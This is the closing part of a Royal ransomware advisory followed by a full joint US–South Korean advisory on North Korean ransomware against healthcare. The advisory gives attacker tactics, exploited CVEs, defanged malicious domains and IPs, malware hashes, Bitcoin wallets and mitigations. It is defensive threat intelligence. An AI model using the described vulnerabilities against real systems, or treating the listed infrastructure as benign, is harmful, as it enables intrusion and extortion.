  • Consider adding an email banner to emails [CPG 8.3] received from outside your organization.
  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. 
  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. 
  • Maintain offline backups of data, and regularly maintain backup and restoration [CPG 7.3]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data. 
  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 3.3].

RESOURCES

REPORTING

FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Royal actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.

Additional details requested include: a targeted company Point of Contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, host and network based indicators.

FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office, or CISA at https://www.cisa.gov/report.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. CISA and FBI do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI.

REFERENCES

[1] Royal Rumble: Analysis of Royal Ransomware (cybereason.com)
[2] DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog
[3] 2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au

ACKNOWLEDGEMENTS

Recorded Future, Coveware, Digital Asset Redemption, Q6, and RedSense contributed to this CSA.

Please share your thoughts. We recently updated our anonymous Product Feedback Survey and we'd welcome your feedback.

February 16, 2023

#StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities | CISA

SUMMARY

Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.

The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.

This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.

The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department of Defense Information Networks and Defense Industrial Base member networks. The IOCs in this product should be useful to sectors previously targeted by DPRK cyber operations (e.g., U.S. government, Department of Defense, and Defense Industrial Base). The authoring agencies highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.

For additional information on state-sponsored DPRK malicious cyber activity, see CISA’s North Korea Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report: pdf, 661 kb.

For a downloadable copy of IOCs, see

AA23-040A STIX XML (XML, 196.24 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 12. See MITRE ATT&CK for Enterprise for all referenced tactics and techniques.

This CSA is supplementary to previous reports on malicious cyber actor activities involving DPRK ransomware campaigns—namely Maui and H0lyGh0st ransomware. The authoring agencies are issuing this advisory to highlight additional observed TTPs DPRK cyber actors are using to conduct ransomware attacks targeting South Korean and U.S. healthcare systems.

Observable TTPs

The TTPs associated with DPRK ransomware attacks include those traditionally observed in ransomware operations. Additionally, these TTPs span phases from acquiring and purchasing infrastructure to concealing DPRK affiliation:

  • Acquire Infrastructure [T1583]. DPRK actors generate domains, personas, and accounts; and identify cryptocurrency services to conduct their ransomware operations. Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft.
  • Obfuscate Identity. DPRK actors purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments.
  • Purchase VPNs and VPSs [T1583.003]. DPRK cyber actors will also use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from DPRK.
  • Gain Access [TA0001]. Actors use various exploits of common vulnerabilities and exposures (CVE) to gain access and escalate privileges on networks. Recently observed CVEs that actors used to gain access include remote code execution in the Apache Log4j software library (known as Log4Shell) and remote code execution in unpatched SonicWall SMA 100 appliances [T1190 and T1133]. Observed CVEs used include:
  • CVE 2021-44228
  • CVE-2021-20038
  • CVE-2022-24990

Actors also likely spread malicious code through Trojanized files for “X-Popup,” an open source messenger commonly used by employees of small and medium hospitals in South Korea [T1195].

The actors spread malware by leveraging two domains: xpopup.pe[.]kr and xpopup.com. xpopup.pe[.]kr is registered to IP address 115.68.95[.]128 and xpopup[.]com is registered to IP address 119.205.197[.]111. Related file names and hashes are listed in table 1.

Table 1: Malicious file names and hashes spread by xpopup domains
File Name MD5 Hash
xpopup.rar 1f239db751ce9a374eb9f908c74a31c9
X-PopUp.exe 6fb13b1b4b42bac05a2ba629f04e3d03
X-PopUp.exe cf8ba073db7f4023af2b13dd75565f3d
xpopup.exe 4e71d52fc39f89204a734b19db1330d3
x-PopUp.exe 43d4994635f72852f719abb604c4a8a1
xpopup.exe 5ae71e8440bf33b46554ce7a7f3de666
  • Move Laterally and Discovery [TA0007, TA0008]. After initial access, DPRK cyber actors use staged payloads with customized malware to perform reconnaissance activities, upload and download additional files and executables, and execute shell commands [T1083, T1021]. The staged malware is also responsible for collecting victim information and sending it to the remote host controlled by the actors [TA0010].
  • Employ Various Ransomware Tools [TA0040]. Actors have used privately developed ransomware, such as Maui and H0lyGh0st [T1486]. Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. In some cases, DPRK actors have portrayed themselves as other ransomware groups, such as the REvil ransomware group. For IOCs associated with Maui and H0lyGh0st ransomware usage, please see Appendix B.
  • Demand Ransom in Cryptocurrency. DPRK cyber actors have been observed setting ransoms in bitcoin [T1486].
  • Actors are known to communicate with victims via Proton Mail email accounts. For private companies in the healthcare sector, actors may threaten to expose a company’s proprietary data to competitors if ransoms are not paid. Bitcoin wallet addresses possibly used by DPRK cyber actors include:
    • 1MTHBCrBKYEthfa16zo9kabt4f9jMJz8Rm
    • bc1q80vc4yjgg6umedkut3e9mhehxl4q4dcjjyzh59
    • 1J8spy62o7z2AjQxoUpiCGnBh5cRWKVWJC
    • 16ENLdHbnmDcEV8iqN4vuyZHa7sSdYRh76
    • bc1q3wzxvu8yhs8h7mlkmf7277wyklkah9k4sm9anu
    • bc1q8xyt4jxhw7mgqpwd6qfdjyxgvjeuz57jxrvgk9
    • 1NqihEqYaQaWiZkPVdSMiTbt7dTy1LMxgX
    • bc1qxrpevck3pq1yzrx2pq2rkvkvy0jnm56nzjv6pw
    • 14hVKm7Ft2rxDBFTNkkRC3kGstMGp2A4hk
    • 1KCwfCUgnSy3pzNX7U1i5NwFzRtth4bRBc
    • 16sYqXancDDiijcuruZecCkdBDwDf4vSEC
    • 1N6JphHFaYmYaokS5xH31Z67bvk4ykd9CP
    • LZ1VNJfn6mWjPzkCyoBvqWaBZYXAwn135
    • 1KmWW6LgdgykBBrSXrFu9kdoHz95Fe9kQF
    • 1FX4W9rrG4F3Uc7gJ18GCwGab8XuW8Ajy2
    • bc1qlqgu2l2kms5338zuc95kxavctzyy0v705tpvyc
    • bc1qy6su7vrh7ts5ng2628escmhr98msmzg62ez2sp
    • bc1q8t69gpxsezdcr8w6tfzp3jeptq4tcp2g9d0mwy
    • bc1q9h7yj79sqm4t536q0fdn7n4y2atsvvl22m28ep
    • bc1qj6y72rk039mqpgtcy7mwjd3eum6cx6027ndgmd
    • bc1qcp557vltuu3qc6pk3ld0ayagrxuf2thp3pjzpe
    • bc1ql8wsflrjf9zlusauynzjm83mupq6c9jz9vnqxg
    • bc1qx60ec3nfd5yhsyyxkzkpts54w970yxj84zrdck
    • bc1qunqnjdlvqkjuhtclfp8kzkjpvdz9qnk898xczp
    • bc1q6024d73h48fnhwswhwt3hqz2lzw6x99q0nulm4
    • bc1qwdvexlyvg3mqvqw7g6l09qup0qew80wjj9jh7x
    • bc1qavrtge4p7dmcrnvhlvuhaarx8rek76wxyk7dgg
    • bc1qagaayd57vr25dlqgk7f00nhz9qepqgnlnt4upu
    • bc1quvnaxnpqlzq3mdhfddh35j7e7ufxh3gpc56hca
    • bc1qu0pvfmtxawm8s99lcjvxapungtsmkvwyvak6cs
    • bc1qg3zlxxhhcvt6hkuhmqml8y9pas76cajcu9ltdl
    • bc1qn7a3g23nzpuytchyyteyhkcse84cnylznl3j32
    • bc1qhfmqstxp3yp9muvuz29wk77vjtdyrkff4nrxpu
    • bc1qnh8scrvuqvlzmzgw7eesyrmtes9c5m78duetf3
    • bc1q7qry3lsrphmnw3exs7tkwzpvzjcxs942aq8n0y
    • bc1qcmlcxfsy0zlqhh72jvvc4rh7hvwhx6scp27na0
    • bc1q498fn0gauj2kkjsg35mlwk2cnxhaqlj7hkh8xy
    • bc1qnz4udqkumjghnm2a3zt0w3ep8fwdcyv3krr3jq
    • bc1qk0saaw7p0wrwla6u7tfjlxrutlgrwnudzx9tyw
    • bc1qyue2pgjk09ps7qvfs559k8kee3jkcw4p4vdp57
    • bc1q6qfkt06xmrpclht3acmq00p7zyy0ejydu89zwv
    • bc1qmge6a7sp659exnx78zhm9zgrw88n6un0rl9trs
    • bc1qcywkd7zqlwmjy36c46dpf8cq6ts6wgkjx0u7cn

MITIGATIONS

Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the U.S. National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.

The authoring agencies urge HPH organizations to:

  • Limit access to data by authenticating and encrypting connections (e.g., using public key infrastructure certificates in virtual private network (VPN) and transport layer security (TLS) connections) with network services, Internet of Things (IoT) medical devices, and the electronic health record system [CPG 3.3].
  • Implement the principle of least privilege by using standard user accounts on internal systems instead of administrative accounts [CPG 1.5], which grant excessive system administration privileges.
  • Turn off weak or unnecessary network device management interfaces, such as Telnet, SSH, Winbox, and HTTP for wide area networks (WANs) and secure with strong passwords and encryption when enabled.
  • Protect stored data by masking the permanent account number (PAN) when displayed and rendering it unreadable when stored—through cryptography, for example.
  • Secure the collection, storage, and processing practices for personally identifiable information (PII)/protected health information (PHI), per regulations such as the Health Insurance Portability and Accountability Act of 1996 (HIPAA). Implementing HIPAA security measures could prevent the introduction of malware to the system [CPG 3.4].
    • Secure PII/ PHI at collection points and encrypt the data at rest and in transit using technologies, such as TLS. Only store personal patient data on internal systems that are protected by firewalls, and ensure extensive backups are available.
    • Create and regularly review internal policies that regulate the collection, storage, access, and monitoring of PII/PHI.
  • Implement and enforce multi-layer network segmentation with the most critical communications and data resting on the most secure and reliable layer [CPG 8.1].
  • Use monitoring tools to observe whether IoT devices are behaving erratically due to a compromise [CPG 3.1].

In addition, the authoring agencies urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for and mitigate ransomware incidents:

  • Maintain isolated backups of data, and regularly test backup and restoration [CPG 7.3]. These practices safeguard an organization’s continuity of operations or at least minimize potential downtime from a ransomware incident and protect against data losses.
    • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
  • Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response procedures for a ransomware incident [CPG 7.1, 7.2].
  • Install updates for operating systems, software, and firmware as soon as they are released [CPG 5.1]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Regularly check for software updates and end-of-life notifications and prioritize patching known exploited vulnerabilities. Consider leveraging a centralized patch management system to automate and expedite the process.
  • If you use Remote Desktop Protocol (RDP), or other potentially risky services, secure and monitor them closely [CPG 5.4].
    • Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources, and require phishing-resistant multifactor authentication (MFA) to mitigate credential theft and reuse [CPG 1.3]. If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports [CPG 1.1, 3.1].
    • Ensure devices are properly configured and that security features are enabled. Disable ports and protocols not in use for a business purpose (e.g., RDP Transmission Control Protocol port 3389).
    • Restrict the Server Message Block (SMB) protocol within the network to only access necessary servers and remove or disable outdated versions of SMB (i.e., SMB version 1). Threat actors use SMB to propagate malware across organizations.
    • Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity [CPG 5.6, 6.2].
    • Implement application control policies that only allow systems to execute known and permitted programs [CPG 2.1].
    • Open document readers in protected viewing modes to help prevent active content from running.
  • Implement a user training program and phishing exercises [CPG 4.3] to raise awareness among users about the risks of visiting websites, clicking on links, and opening attachments. Reinforce the appropriate user response to phishing and spearphishing emails.
  • Require phishing-resistant MFA for as many services as possible [CPG 1.3]—particularly for webmail, VPNs, accounts that access critical systems, and privileged accounts that manage backups.
  • Use strong passwords [CPG 1.4] and avoid reusing passwords for multiple accounts. See CISA Tip Choosing and Protecting Passwords and National Institute of Standards and Technology (NIST) Special Publication 800-63B: Digital Identity Guidelines for more information.
  • Require administrator credentials to install software [CPG 1.5].
  • Audit user accounts with administrative or elevated privileges [CPG 1.5] and configure access controls with least privilege in mind.
  • Install and regularly update antivirus and antimalware software on all hosts.
  • Only use secure networks. Consider installing and using a VPN.
  • Consider adding an email banner to messages coming from outside your organizations [CPG 8.3] indicating that they are higher risk messages.
  • Consider participating in CISA’s no-cost Automated Indicator Sharing (AIS) program to receive real-time exchange of machine-readable cyber threat indicators and defensive measures.

If a ransomware incident occurs at your organization:

  • Follow your organization’s ransomware response checklist.
  • Scan backups. If possible, scan backup data with an antivirus program to check that it is free of malware. This should be performed using an isolated, trusted system to avoid exposing backups to potential compromise.
  • U.S. organizations: Follow the notification requirements as outlined in your cyber incident response plan. Report incidents to appropriate authorities; in the U.S., this would include the FBI at a local FBI Field Office, CISA at cisa.gov/report, or the U.S. Secret Service (USSS) at a USSS Field Office.
  • South Korean organizations: Please report incidents to NIS, KISA (Korea Internet & Security Agency), and KNPA (Korean National Police Agency).
  • Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.

RESOURCES

Stairwell provided a YARA rule to identify Maui ransomware, and a Proof of Concept public RSA key extractor at the following link:
https://www.stairwell.com/news/threat-research-report-maui-ransomware/

REQUEST FOR INFORMATION

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files. As stated above, the authoring agencies discourage paying ransoms. Payment does not guarantee files will be recovered and may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. However, the agencies understand that when victims are faced with an inability to function, all options are evaluated to protect shareholders, employees, and customers.

Regardless of whether you or your organization decide to pay a ransom, the authoring agencies urge you to promptly report ransomware incidents using the contact information above.

ACKNOWLEDGEMENTS

NSA, FBI, CISA, and HHS would like to thank ROK NIS and DSA for their contributions to this CSA.

Disclaimer of endorsement

The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.

Trademark recognition

Microsoft Threat Intelligence Center is a registered trademark of Microsoft Corporation. Apache®, Sonicwall, and Apache Log4j are trademarks of Apache Software Foundation. TerraMaster Operating System is a registered trademark of Octagon Systems.

Purpose

This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Appendix A: CVE Details
CVE-2021-44228     CVSS 3.0: 10 (Critical)
Vulnerability Description
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Recommended Mitigations
Apply patches provided by vendor and perform required system updates.
Detection Methods
See vendors’ Guidance For Preventing, Detecting, and Hunting for Exploitation of the Log4j 2 Vulnerability.
Vulnerable Technologies and Versions
There are numerous vulnerable technologies and versions associated with CVE-2021-44228. For a full list, please check https://nvd.nist.gov/vuln/detail/CVE-2021-44228.
See https://nvd.nist.gov/vuln/detail/CVE-2021-44228 for more information.
CVE-2021-20038     CVSS 3.0: 9.8 (Critical)
Vulnerability Description
A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.
Recommended Mitigations
Apply all appropriate vendor updates
Upgrade to:
  • SMA 100 Series - (SMA 200, 210, 400, 410, 500v (ESX, Hyper-V, KVM, AWS, Azure):
  • SonicWall SMA100 build versions 10.2.0.9-41sv or later
  • SonicWall SMA100 build versions 10.2.1.3-27sv or later

System administrators should refer to the SonicWall Security Advisories in the reference section to determine affected applications/systems and appropriate fix actions.

Support for 9.0.0 firmware ended on 10/31/2021. Customers still using that firmware are requested to upgrade to the latest 10.2.x versions.

Vulnerable Technologies and Versions
Sonicwall Sma 200 Firmware 10.2.0.8-37Sv
Sonicwall Sma 200 Firmware 10.2.1.1-19Sv
Sonicwall Sma 200 Firmware 10.2.1.2-24Sv
Sonicwall Sma 210 Firmware 10.2.0.8-37Sv
Sonicwall Sma 210 Firmware 10.2.1.1-19Sv
Sonicwall Sma 210 Firmware 10.2.1.2-24Sv
Sonicwall Sma 410 Firmware 10.2.0.8-37Sv
Sonicwall Sma 410 Firmware 10.2.1.1-19Sv
Sonicwall Sma 410 Firmware 10.2.1.2-24Sv
Sonicwall Sma 400 Firmware 10.2.0.8-37Sv
Sonicwall Sma 400 Firmware 10.2.1.1-19Sv
Sonicwall Sma 400 Firmware 10.2.1.2-24Sv
Sonicwall Sma 500V Firmware 10.2.0.8-37Sv
Sonicwall Sma 500V Firmware 10.2.1.1-19Sv
Sonicwall Sma 500V Firmware 10.2.1.2-24Sv
See https://nvd.nist.gov/vuln/detail/CVE-2021-20038 for more information.
CVE-2022-24990    CVSS 3.x: N/A
Vulnerability Description
The TerraMaster OS Unauthenticated Remote Command Execution via PHP Object Instantiation Vulnerability is characterized by scanning activity targeting a flaw in the script enabling a remote adversary to execute commands on the target endpoint. The vulnerability is created by improper input validation of the webNasIPS component in the api.php script and resides on the TNAS device appliances' operating system where users manage storage, backup data, and configure applications. By exploiting the script flaw a remote unauthenticated attacker can pass specially crafted data to the application and execute arbitrary commands on the target system. This may result in complete compromise of the target system, including the exfiltration of information. TNAS devices can be chained to acquire unauthenticated remote code execution with highest privileges.
Recommended Mitigations
Install relevant vendor patches. This vulnerability was patched in TOS version 4.2.30
Vulnerable Technologies and Versions
TOS v 4.2.29
See https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/ and https://forum.terra-master.com/en/viewtopic.php?t=3030 for more information.
Appendix B: Indicators of Compromise (IOCs)

The IOC section includes hashes and IP addresses for the Maui and H0lyGh0st ransomware variants—as well as custom malware implants assumedly developed by DPRK cyber actors, such as remote access trojans (RATs), loaders, and other tools—that enable subsequent deployment of ransomware. For additional Maui IOCs, see joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

Table 2 lists MD5 and SHA256 hashes associated with malware implants, RATs, and other tools used by DPRK cyber actors, including tools that drop Maui ransomware files.

Table 2: File names and hashes of malicious implants, RATs, and tools
MD5Hash SHA256Hash
079b4588eaa99a1e802adf5e0b26d8aa f67ee77d6129bd1bcd5d856c0fc5314169b946d32b8abaa4e680bb98130b38e7
0e9e256d8173854a7bc26982b1dde783 --
12c15a477e1a96120c09a860c9d479b3 6263e421e397db821669420489d2d3084f408671524fd4e1e23165a16dda2225
131fc4375971af391b459de33f81c253 --
17c46ed7b80c2e4dbea6d0e88ea0827c b9af4660da00c7fa975910d0a19fda072031c15fad1eef935a609842c51b7f7d
1875f6a68f70bee316c8a6eda9ebf8de 672ec8899b8ee513dbfc4590440a61023846ddc2ca94c88ae637144305c497e7
1a74c8d8b74ca2411c1d3d22373a6769 ba8f9e7afe5f78494c111971c39a89111ef9262bf23e8a764c6f65c818837a44
1f6d9f8fbdbbd4e6ed8cd73b9e95a928 4f089afa51fd0c1b2a39cc11cedb3a4a326111837a5408379384be6fe846e016
2d02f5499d35a8dffb4c8bc0b7fec5c2 830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570
2e18350194e59bc6a2a3f6d59da11bd8 655aa64860f1655081489cf85b77f72a49de846a99dd122093db4018434b83ae
3bd22e0ac965ebb6a18bb71ba39e96dc 6b7f566889b80d1dba4f92d5e2fb2f5ef24f57fcfd56bb594978dffe9edbb9eb
40f21743f9cb927b2c84ecdb7dfb14a6 5081f54761947bc9ce4aa2a259a0bd60b4ec03d32605f8e3635c4d4edaf48894
4118d9adce7350c3eedeb056a3335346 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e
43e756d80225bdf1200bc34eef5adca8 afb2d4d88f59e528f0e388705113ae54b7b97db4f03a35ae43cc386a48f263a0
47791bf9e017e3001ddc68a7351ca2d6 863b707873f7d653911e46885e261380b410bb3bf6b158daefb47562e93cb657
505262547f8879249794fc31eea41fc6 f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
5130888a0ad3d64ad33c65de696d3fa2 c92c1f3e77a1876086ce530e87aa9c1f9cbc5e93c5e755b29cad10a2f3991435
58ad3103295afcc22bde8d81e77c282f 18b75949e03f8dcad513426f1f9f3ca209d779c24cd4e941d935633b1bec00cb
5be1e382cd9730fbe386b69bd8045ee7 5ad106e333de056eac78403b033b89c58b4c4bdda12e2f774625d47ccfd3d3ae
5c6f9c83426c6d33ff2d4e72c039b747 a3b7e88d998078cfd8cdf37fa5454c45f6cbd65f4595fb94b2e9c85fe767ad47
640e70b0230dc026eff922fb1e44c2ea 6319102bac226dfc117c3c9e620cd99c7eafbf3874832f2ce085850aa042f19c
67f4dad1a94ed8a47283c2c0c05a7594 3fe624c33790b409421f4fa2bb8abfd701df2231a959493c33187ed34bec0ae7
70652edadedbacfd30d33a826853467d 196fb1b6eff4e7a049cea323459cfd6c0e3900d8d69e1d80bffbaabd24c06eba
739812e2ae1327a94e441719b885bd19 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67
76c3d2092737d964dfd627f1ced0af80 bffe910904efd1f69544daa9b72f2a70fb29f73c51070bde4ea563de862ce4b1
802e7d6e80d7a60e17f9ffbd62fcbbeb 87bdb1de1dd6b0b75879d8b8aef80b562ec4fad365d7abbc629bcfc1d386afa6
827103a6b6185191fd5618b7e82da292 --
830bc975a04ab0f62bfedf27f7aca673 --
85995257ac07ae5a6b4a86758a2283d7 --
85f6e3e3f0bdd0c1b3084fc86ee59d19 f1576627e8130e6d5fde0dbe3dffcc8bc9eef1203d15fcf09cd877ced1ccc72a
87a6bda486554ab16c82bdfb12452e8b 980bb08ef3e8afcb8c0c1a879ec11c41b29fd30ac65436495e69de79c555b2be
891db50188a90ddacfaf7567d2d0355d 0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207
894de380a249e677be2acb8fbdfba2ef --
8b395cc6ecdec0900facf6e93ec48fbb --
92a6c017830cda80133bf97eb77d3292 d1aba3f95f11fc6e5fec7694d188919555b7ff097500e811ff4a5319f8f230be
9b0e7c460a80f740d455a7521f0eada1 45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78
9b9d4cb1f681f19417e541178d8c75d7 f5f6e538001803b0aa008422caf2c3c2a79b2eeee9ddc7feda710e4aba96fea4
a1f9e9f5061313325a275d448d4ddd59 dfdd72c9ce1212f9d9455e2bca5a327c88d2d424ea5c086725897c83afc3d42d
a452a5f693036320b580d28ee55ae2a3 99b0056b7cc2e305d4ccb0ac0a8a270d3fceb21ef6fc2eb13521a930cea8bd9f
a6e1efd70a077be032f052bb75544358 3b9fe1713f638f85f20ea56fd09d20a96cd6d288732b04b073248b56cdaef878
ad4eababfe125110299e5a24be84472e a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa
b1c1d28dc7da1d58abab73fa98f60a83 38491f48d0cbaab7305b5ddca64ba41a2beb89d81d5fb920e67d0c7334c89131
b6f91a965b8404d1a276e43e61319931 --
bdece9758bf34fcad9cba1394519019b 9d6de05f9a3e62044ad9ae66111308ccb9ed2ee46a3ea37d85afa92e314e7127
c3850f4cc12717c2b54753f8ca5d5e0e 99b448e91669b92c2cc3417a4d9711209509274dab5d7582baacfab5028a818c
c50b839f2fc3ce5a385b9ae1c05def3a 458d258005f39d72ce47c111a7d17e8c52fe5fc7dd98575771640d9009385456
cf236bf5b41d26967b1ce04ebbdb4041 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145
d0e203e8845bf282475a8f816340f2e8 f6375c5276d1178a2a0fe1a16c5668ce523e2f846c073bf75bb2558fdec06531
ddb1f970371fa32faae61fc5b8423d4b dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
f2f787868a3064407d79173ac5fc0864 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae
fda3a19afa85912f6dc8452675245d6b 56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19
-- 0054147db54544d77a9efd9baf5ec96a80b430e170d6e7c22fcf75261e9a3a71
-- 151ab3e05a23e9ccd03a6c49830dabb9e9281faf279c31ae40b13e6971dd2fb8
-- 1c926fb3bd99f4a586ed476e4683163892f3958581bf8c24235cd2a415513b7f
-- 1f8dcfaebbcd7e71c2872e0ba2fc6db81d651cf654a21d33c78eae6662e62392
-- f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
-- 23eff00dde0ee27dabad28c1f4ffb8b09e876f1e1a77c1e6fb735ab517d79b76
-- 586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730
-- 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
-- 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
-- c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
-- ca932ccaa30955f2fffb1122234fb1524f7de3a8e0044de1ed4fe05cab8702a5
-- f6827dc5af661fbb4bf64bc625c78283ef836c6985bb2bfb836bd0c8d5397332
-- f78cabf7a0e7ed3ef2d1c976c1486281f56a6503354b87219b466f2f7a0b65c4

Table 3 lists MD5 and SHA256 hashes are associated with Maui Ransomware files.

Table 3: File names and hashes of Maui ransomware files
MD5 Hash SHA256 Hash
4118d9adce7350c3eedeb056a3335346 5b7ecf7e9d0715f1122baf4ce745c5fcd769dee48150616753fec4d6da16e99e
9b0e7c460a80f740d455a7521f0eada1 45d8ac1ac692d6bb0fe776620371fca02b60cac8db23c4cc7ab5df262da42b78
fda3a19afa85912f6dc8452675245d6b 56925a1f7d853d814f80e98a1c4890b0a6a84c83a8eded34c585c98b2df6ab19
2d02f5499d35a8dffb4c8bc0b7fec5c2 830207029d83fd46a4a89cd623103ba2321b866428aa04360376e6a390063570
